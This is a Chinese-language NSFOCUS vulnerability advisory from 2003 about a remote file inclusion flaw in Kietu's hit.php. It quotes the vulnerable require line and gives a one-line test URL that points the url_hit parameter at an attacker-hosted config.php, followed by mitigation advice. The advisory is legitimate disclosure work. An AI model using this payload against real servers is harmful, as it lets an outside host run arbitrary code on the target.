首页 -> 安全研究

安全研究

安全漏洞
Kietu hit.php远程文件包含漏洞

发布日期:2003-02-15
更新日期:2003-02-21

受影响系统:
Kietu Kietu 2.3
Kietu Kietu 2.0
描述:
BUGTRAQ  ID: 6863

Kietu是一款由PHP编写的程序。

Kietu对用户提交的请求缺少正确检查,远程攻击者可以利用这个漏洞包含远程服务器上的文件,以WEB进程权限执行文件中包含的任意代码。

hit.php文件中包含如下代码:

require ($url_hit."config.php");

由于没有对$url_hit变量没有预先定义,因此可以通过全局注入来进行变量定义,攻击者可以指定远程系统中的PHP文件作为参数提交给$url_hit变量,可导致以WEB进程权限执行PHP文件中包含的恶意代码。

<*来源:Frog Man (leseulfrog@hotmail.com
  
  链接:http://www.frog-man.org/tutos/5holes8.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Frog Man (leseulfrog@hotmail.com)提供了如下测试方法:

http://[traget]/hit.php?url_hit=http://[attacker]/config.php

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在php.ini文件中设置'allow_url_fopen'和'register_globals'为'off'。

* Frog Man <leseulfrog@hotmail.com>提供了第三方补丁程序:

http://www.phpsecure.org

厂商补丁:

Kietu
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://kietu.free.fr/

浏览次数:2730
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障